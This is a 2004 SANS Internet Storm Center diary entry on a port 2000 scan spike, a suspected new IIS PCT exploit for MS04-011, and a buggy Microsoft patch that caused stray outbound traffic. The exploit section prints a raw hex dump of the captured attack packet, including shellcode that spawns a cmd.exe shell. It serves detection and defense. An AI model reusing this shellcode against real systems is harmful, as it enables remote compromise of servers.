Threat Level: green Handler on Duty: Manuel Pelaez

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Port 2000 spike; New IIS PCT exploit?; Following the bouncing MS patches

Published: 2004-10-25
Last Updated: 2004-10-25 23:13:52 UTC
by Kyle Haugsness (Version: 1)
0 comment(s)
Port 2000 spike

There is a significant increase in port 2000 activity. Given the number
of targets, this appears to general sweeping. At this point, we don't
have a good feeling for what is causing this increase. If you have some
packet captures, send them along.

http://isc.sans.org/port_details.php?port=2000

New IIS PCT exploit in the wild?

We received a report that a possibly new IIS PCT exploit (for MS04-011)
is being used in the wild. Exploit code for this vulnerability has been
known to exist as early as April 2004, so this NOT a new vulnerability.
This packet capture appears to have 25 extra bytes beginning at offset
0x0E0 below. At this time, we have not been able to determine whether
this is completely new, but it should be identified by most IDS
signatures given the obvious strings "THCOWNZIIS!" and "cmd.exe", which
were also in the original exploit code.



000 80 62 01 02 BD 00 01 00 01 00 16 8F 82 01 00 00 .b..............
010 00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^
020 BE 98 EB 25 96 AA 46 DA 69 4E 02 06 6C 59 6C 59 ...%..F.iN..lYlY
030 F8 1D 9C DE 8C D1 4C 70 D4 03 58 46 57 53 32 5F ......Lp..XFWS2_
040 33 32 2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 32.DLL........].
050 ED 2C 6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B .,j0Yd...@..p...
060 78 08 8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B x.._<.....[x...K
070 1C 01 F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB ....S$..SQR.[ ..
080 31 C9 41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 1.A1...4....1...
090 84 C0 75 F7 0F B6 45 09 8D 44 45 08 66 39 10 75 ..u...E..DE.f9.u
0A0 E1 66 31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 .f1.ZX^VPR+N.A..
0B0 0C 4A 8B 04 88 01 F8 0F B6 4D 09 89 44 8D D8 FE .J.......M..D...
0C0 4D 09 75 BE FE 4D 08 74 17 FE 4D 24 8D 5D 1A 53 M.u..M.t..M$.].S
0D0 FF D0 89 C7 6A 02 58 88 45 09 80 45 79 0C EB 82 ....j.X.E..Ey...
0E0 50 8B 45 04 35 93 93 93 93 89 45 04 66 8B 45 02 P.E.5.....E.f.E.
0F0 66 35 93 93 66 89 45 02 58 89 CE 31 DB 53 53 53 f5..f.E.X..1.SSS
100 53 56 46 56 FF D0 89 C7 55 58 66 89 30 6A 10 55 SVFV....UXf.0j.U
110 57 FF 55 E0 8D 45 88 50 FF 55 E8 55 55 FF 55 EC W.U..E.P.U.UU.U.
120 8D 44 05 0C 94 53 68 2E 65 78 65 68 5C 63 6D 64 .D...Sh.exeh\cmd
130 94 31 D2 8D 45 CC 94 57 57 57 53 53 FE CA 01 F2 .1..E..WWWSS....
140 52 94 8D 45 78 50 8D 45 88 50 B1 08 53 53 6A 10 R..ExP.E.P..SSj.
150 FE CE 52 53 53 53 55 FF 55 F0 6A FF FF 55 E4 ..RSSSU.U.j..U.


Following the bouncing MS patches

While Tom Liston is busy working on the next installation of "bouncing
malware", here is an interesting story about misbehaving software.


Several weeks ago, a concerned reader submitted an interesting case to
ISC suspecting a new virus or system compromise. Harpal Parmar reported
that a Windows 2000 server running SP4 and fully patched was sending
unsolicited packets outbound to specific addresses in the IP range:
128.x.x.x -- 136.x.x.x.


The traffic was sending normal TCP packets to random destination hosts
in the above range on TCP port 139 every 10 minutes. Fortunately,
Harpal had outbound filtering in place so the packets never made it to
their destination. Upon not receiving a response, the server would
retransmit the TCP segments using the normal backoff timing of TCP (3,
6, and 12 second intervals).


ISC handlers reviewed a packet capture provided by Harpal and found no
evidence of malware or system compromise. So after utilizing several
different virus scanners and discovering no malware, Harpal looked for
different alternatives as the source cause. The first step was to
rebuild the server offline and monitor for outbound traffic. After
applying a specific patch, MS04-011 (KB835732), the activity started
again. Indeed, this patch was confirmed to be the source of the
problem after being investigated by an engineer at Microsoft. Another
patch was provided by Microsoft that corrected the problem.


Apparently, the operating system was looking for the SYSVOL$ folder on a
domain controller and a bug was causing the IP address to be obtained
from random memory addresses.


Specific symptoms experienced:

o Windows 2000 SP4

o Dual processor machine (x86)

o IIS installed/enabled

o File and printer sharing disabled

o Outbound connections to TCP port 139 every 10 minutes in IP range: 128.x.x.x -- 136.x.x.x


Resolution:

o Problem caused by application of MS04-011 (KB835732)

o Problem fixed by workaround or patch available at:

http://support.microsoft.com/default.aspx?scid=kb;en-us;842638

Follow-up on Fake RedHat Advisory

The k-otik folks have an analysis of the bad things that might happen
if you follow the instructions in the fake RedHat advisory that was
reported in yesterday's diary:
http://www.k-otik.com/news/FakeRedhatPatchAnalysis.txt

Follow-up on how to identify "normal" processes on Windows

A couple of additional URLs that may be useful when trying to to
identify good/bad processes in Windows. Please note that these sites
are hosted by companies with commercial products. This is not an
endorsement of any commercial products by SANS or the Internet Storm
Center (isn't it fun to be politically correct?).

http://answersthatwork.com/Tasklist_pages/tasklist.htm

http://www.liutilities.com/products/wintaskspro/processlibrary/

Keywords:
0 comment(s)
Diary Archives